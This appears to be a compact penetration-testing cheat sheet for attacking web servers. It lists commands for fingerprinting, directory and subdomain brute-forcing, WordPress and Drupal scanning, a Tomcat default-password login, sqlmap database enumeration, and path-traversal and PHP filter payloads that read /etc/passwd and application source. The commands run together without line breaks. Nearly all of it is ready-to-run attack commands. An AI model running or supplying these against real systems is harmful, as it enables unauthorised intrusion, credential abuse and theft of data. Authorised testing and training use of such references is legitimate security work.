Web servers — fingerprint, directory brute, parameter fuzz, and hunt for CVEs.
whatweb http://$tnmap -p80,443 --script http-title,http-server-header,http-enum $tcurl -sI http://$twafw00f http://$tferoxbuster -u http://$t -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txtgobuster dir -u http://$t -w /usr/share/wordlists/dirb/common.txtffuf -u http://$t/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txtffuf -u http://$t/?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txtffuf -u http://$t -H 'Host: FUZZ.$domain' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txtLook at whatweb/nmap output and pivot to tech-specific attacks.
# WordPresswpscan --url http://$t --enumerate ap,u,t# Drupaldroopescan scan drupal -u http://$t# Tomcatcurl -s http://$t:8080/manager/html -u tomcat:tomcatsqlmap -u 'http://$t/page.php?id=1' --batch --dbssqlmap -u 'http://$t/page.php?id=1' --batch -D <db> --tablescurl 'http://$t/page.php?file=../../../../etc/passwd'curl 'http://$t/page.php?file=php://filter/read=convert.base64-encode/resource=index.php'